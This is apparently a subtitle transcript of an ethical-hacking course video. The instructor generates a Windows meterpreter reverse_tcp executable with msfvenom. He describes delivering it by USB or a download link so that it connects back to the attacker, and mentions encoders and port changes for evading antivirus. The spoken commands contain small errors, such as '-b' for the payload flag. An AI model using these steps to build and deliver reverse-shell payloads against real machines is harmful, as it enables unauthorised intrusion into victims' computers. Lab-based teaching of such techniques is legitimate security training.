1
00:00:00,150 --> 00:00:00,830
Hello everybody

2
00:00:00,900 --> 00:00:02,500
and welcome back.

3
00:00:02,500 --> 00:00:09,350
And let us see some of the examples of actually crafting the payload for the Windows meterpreter shell.

4
00:00:09,480 --> 00:00:17,510
So, we already were introduced to the MSF Venom tool which allows us to create our own payloads,

5
00:00:17,530 --> 00:00:18,150
but

6
00:00:18,240 --> 00:00:24,840
we only did that in the PHP meterpreter attack where we executed the meterpreter shell with the command

7
00:00:24,840 --> 00:00:30,960
injection and PHP code injection. But right now let's see how you can hack any Windows machine

8
00:00:31,260 --> 00:00:34,110
with delivering the payload over

9
00:00:34,110 --> 00:00:39,510
a USB drive, or basically just sending a link to someone for someone to download. And when they

10
00:00:39,520 --> 00:00:42,930
execute it they automatically connect back to you.

11
00:00:42,930 --> 00:00:45,600
So, this will be an attack that is based on

12
00:00:45,690 --> 00:00:46,510
every version of Windows,

13
00:00:46,530 --> 00:00:52,310
and as a target we will use my Windows 10 host machine.

14
00:00:52,320 --> 00:00:58,530
Now Windows 10 is the newest Windows version, so you will see that it works even on the newest one,

15
00:00:58,540 --> 00:01:01,710
since it is a payload that gets executed by the target.

16
00:01:01,710 --> 00:01:06,710
So they have to open it in order for them to connect back to us.

17
00:01:06,720 --> 00:01:15,570
So, first of all, what we want to do is basically just type here msfvenom, and we will get a bunch of

18
00:01:15,570 --> 00:01:22,110
these options that we need to use in order to specify some of the things that our payload will have.

19
00:01:22,110 --> 00:01:24,090
So we were already introduced to

20
00:01:24,090 --> 00:01:31,950
some of them such as LHOST, LPORT and -p for the payload. As we can see, these are options that

21
00:01:31,950 --> 00:01:33,160
we always specify,

22
00:01:33,160 --> 00:01:41,190
so what type of payload we want. After that we specify some of the payload options such as the local

23
00:01:41,190 --> 00:01:46,920
host which is the IP address of our Kali Linux machine, and local port which is the listening port

24
00:01:46,920 --> 00:01:48,660
our Kali Linux machine.

25
00:01:48,660 --> 00:01:55,010
Now the IP address is basically the output of ifconfig, and the local port can be any port you specify

26
00:01:55,020 --> 00:01:56,780
that isn't actually used.

27
00:01:57,120 --> 00:02:02,660
So, by default, as I said, Metasploit chooses the port 4444.

28
00:02:03,030 --> 00:02:04,380
So we will stick with that.

29
00:02:04,380 --> 00:02:12,000
So, let us actually just open up our msfconsole for a second to see what are our available payloads.

30
00:02:12,000 --> 00:02:15,420
Now in order to craft the payload you need to know the name of the payload itself.

31
00:02:15,420 --> 00:02:24,030
So, the most used one is the windows/meterpreter/reverse_tcp since it actually connects back

32
00:02:24,030 --> 00:02:30,570
to us over TCP, and allows us to run our commands over meterpreter shell. But, that is not the only

33
00:02:30,900 --> 00:02:32,460
payload that is used for Windows.

34
00:02:32,460 --> 00:02:36,630
There are a bunch of others. We will just type here search windows payloads.

35
00:02:37,050 --> 00:02:39,240
So let me just...

36
00:02:40,020 --> 00:02:43,230
or we can just type here search payloads. And what we will do,

37
00:02:43,230 --> 00:02:45,360
let me just first zoom in on this.

38
00:02:45,380 --> 00:02:48,210
so it looks a little bit prettier.

39
00:02:48,210 --> 00:02:49,290
We want to find...

40
00:02:54,270 --> 00:02:56,880
Windows, Windows, right.

41
00:02:56,880 --> 00:03:04,380
These are not payloads, search payloads.

42
00:03:06,270 --> 00:03:14,260
So let me see if I type here search payload, OK, payload.

43
00:03:14,310 --> 00:03:15,390
Okay, so here they are.

44
00:03:15,390 --> 00:03:24,720
Let me just zoom out once again, and we can see all of the payloads for all operating systems. So this

45
00:03:24,720 --> 00:03:26,780
is not only for Windows.

46
00:03:26,790 --> 00:03:31,130
This is basically also for Linux, or you can see here

47
00:03:31,130 --> 00:03:33,380
PHP as well. Let me just show you.

48
00:03:33,380 --> 00:03:36,630
There is the payload that we used in the previous videos.

49
00:03:36,630 --> 00:03:43,560
So php/meterpreter/reverse_tcp, so this is the payload that we are already familiar with. But what we

50
00:03:43,560 --> 00:03:52,740
want to do now is search payload/windows and then press enter,

51
00:03:53,130 --> 00:03:56,530
and so we only get the Windows payloads right here.

52
00:03:56,700 --> 00:04:00,780
Now most of these you will most likely never use.

53
00:04:00,930 --> 00:04:06,740
As I said, the most important ones, and the ones that we will use right now, are these two.

54
00:04:06,750 --> 00:04:12,430
So, windows/x64/meterpreter_reverse_tcp.

55
00:04:12,430 --> 00:04:18,090
Now that is the meterpreter payload for the x64 or 64 bit Windows.

56
00:04:18,450 --> 00:04:25,450
And we also need the Windows meterpreter regular shell.

57
00:04:25,450 --> 00:04:29,110
So that is the, let me just find it...

58
00:04:29,110 --> 00:04:32,640
reverse TCP, here it is.

59
00:04:32,640 --> 00:04:36,120
So this is the regular one for the 32 bit windows.

60
00:04:36,240 --> 00:04:38,660
Now you will see that it does matter which one you use.

61
00:04:38,730 --> 00:04:45,450
But, basically, if you use a 32 bit on 64 bit machine it won't make such a problem, unless we are running

62
00:04:45,450 --> 00:04:48,030
our Eternal Blue exploit which I will show you later.

63
00:04:48,030 --> 00:04:54,420
But if you just run a simple payload as an executable the target executes, you can both use a 64 bit and

64
00:04:54,420 --> 00:05:02,190
32 bit on a 64 bit machine. But you will not be able to run a 64 bit meterpreter shell on a

65
00:05:02,190 --> 00:05:03,660
32 bit machine.

66
00:05:03,840 --> 00:05:05,810
So that is also useful to know.

67
00:05:05,940 --> 00:05:08,430
The one that we will use is this one.

68
00:05:08,430 --> 00:05:13,170
So let us just copy it since that is the payload that we will use.

69
00:05:13,170 --> 00:05:20,280
And right now let us exit the msfconsole, and let me just zoom it in once again so you can see

70
00:05:20,370 --> 00:05:23,800
better. And let's type here,

71
00:05:23,800 --> 00:05:29,520
msfvenom --help, once again. We want to use this option.

72
00:05:30,150 --> 00:05:38,760
The next option that we can possibly use is the encoder. So we can encode our payload if we want to, basically,

73
00:05:38,760 --> 00:05:39,930
it is not necessary.

74
00:05:39,930 --> 00:05:45,780
It can actually bypass some anti viruses, but most of the encoders are actually old ones

75
00:05:45,780 --> 00:05:52,570
so they are already familiar. I mean, anti-viruses are already familiar with them.

76
00:05:52,580 --> 00:05:57,220
So it's not really that good to use them, but you can use them if you want to.

77
00:05:57,220 --> 00:06:09,990
So let me just cd to the usr/share/metasploit-framework/modules/encoders,

78
00:06:10,070 --> 00:06:14,970
cd x64...actually I want to go to cd x86,

79
00:06:17,640 --> 00:06:19,830
and we can choose any encoder we want.

80
00:06:19,860 --> 00:06:26,040
Now, the most important one is the shikata_ga_nai encoder, but that really basically doesn't do anything

81
00:06:26,040 --> 00:06:31,710
since it is already well known by the antivirus companies.

82
00:06:31,920 --> 00:06:39,480
First of all, since my Windows 10 machine is actually a 64 bit machine, I will use a 64

83
00:06:39,480 --> 00:06:39,960
bit.

84
00:06:39,960 --> 00:06:42,530
So let's see what we have here.

85
00:06:42,690 --> 00:06:47,030
We will, for example, use this zutto_dekiru.rb,

86
00:06:47,160 --> 00:06:48,670
so we will use that.

87
00:06:48,690 --> 00:06:56,030
But, first of all, let me show you what it looks like when there is no encoder.

88
00:06:56,030 --> 00:07:04,370
So msfvenom -b for the payload, and we want to use windows/x64/meterpreter/reverse_tcp

89
00:07:05,400 --> 00:07:09,190
So, if you just select this it will basically

90
00:07:09,480 --> 00:07:15,400
make a simple payload, I believe, without specifying the LHOST and LPORT.

91
00:07:15,450 --> 00:07:18,810
Or, it may actually show you an error that you didn't specify it.

92
00:07:18,960 --> 00:07:21,930
So we will specify it just in case.

93
00:07:21,960 --> 00:07:24,710
Let me just check out, oops...

94
00:07:24,750 --> 00:07:30,840
Let me just check out my IP address first, which is 192.168.1.4

95
00:07:30,890 --> 00:07:32,870
So your IP address is the LHOST.

96
00:07:32,910 --> 00:07:35,020
So let us type here once again.

97
00:07:36,150 --> 00:07:44,360
So, msfvenom -b and then our payload, which I will use the windows/x64/meterpreter/reverse_tcp

98
00:07:45,570 --> 00:07:53,770
Then we specify LHOST=192.168.1.4. Now that we did, that next thing we want

99
00:07:53,770 --> 00:07:55,510
to specify is the LPORT.

100
00:07:55,720 --> 00:08:00,660
Now, as I said, by default Metasploit uses 4444.

101
00:08:00,760 --> 00:08:08,500
But, if you want to, you can change this since some systems actually block this port, since it is a

102
00:08:08,500 --> 00:08:10,130
well known Metasploit port.

103
00:08:10,300 --> 00:08:15,520
So it can be a bypass measure if you simply just change this port, though you do not

104
00:08:15,520 --> 00:08:16,670
have to really.

105
00:08:16,830 --> 00:08:23,050
We will stick with 4444 for now on. And what you want to type here is -f after that, and

106
00:08:23,050 --> 00:08:31,330
then exe, which stands for the exe file. Then we specify the arrow to the right, and then we name

107
00:08:31,420 --> 00:08:38,320
our shell, or reverse shell, or meterpreter shell. Whatever you want to call it. We will name it reverse.exe

108
00:08:38,320 --> 00:08:38,940
reverse.exe

109
00:08:39,850 --> 00:08:43,450
If we click enter right here it will create a shell for us.

110
00:08:43,510 --> 00:08:45,130
Now, what you want to do,

111
00:08:45,160 --> 00:08:53,290
basically, we will upload this in the next video to the virus total, which is a website that is

112
00:08:53,290 --> 00:09:00,190
used to scan programs, or basically anti-viruses, in order to see how many anti-viruses detect this.

113
00:09:00,200 --> 00:09:02,740
Now, let us just read this.

114
00:09:02,740 --> 00:09:08,080
You can see the size of this. As we can see, the payload size is 510 bytes, and the final

115
00:09:08,080 --> 00:09:11,530
size of the exe file is 7000 bytes.

116
00:09:11,560 --> 00:09:17,710
So, if you just type here ls and you cat reverse.exe, basically, it will be

117
00:09:17,710 --> 00:09:19,190
some scrambled code.

118
00:09:19,210 --> 00:09:28,030
So, this is just how to create the simple payload for Windows. In the next lecture I'll show you how

119
00:09:28,030 --> 00:09:29,330
detectable this is.

120
00:09:29,380 --> 00:09:36,820
And it is, trust me, very detectable. Like 90% of antiviruses will catch this since it is something

121
00:09:36,820 --> 00:09:42,760
that everyone that uses Kali Linux made at some point and used. And it is well known in the databases of

122
00:09:42,760 --> 00:09:44,050
anti-viruses.

123
00:09:44,230 --> 00:09:49,690
But we will see what actions we can take in order to make it less detectable using, for example, encoders,

124
00:09:49,720 --> 00:09:57,150
or basically just editing the binary itself. But, more about that in the next video.

125
00:09:57,160 --> 00:10:00,140
So I hope I see you there and take care. Bye!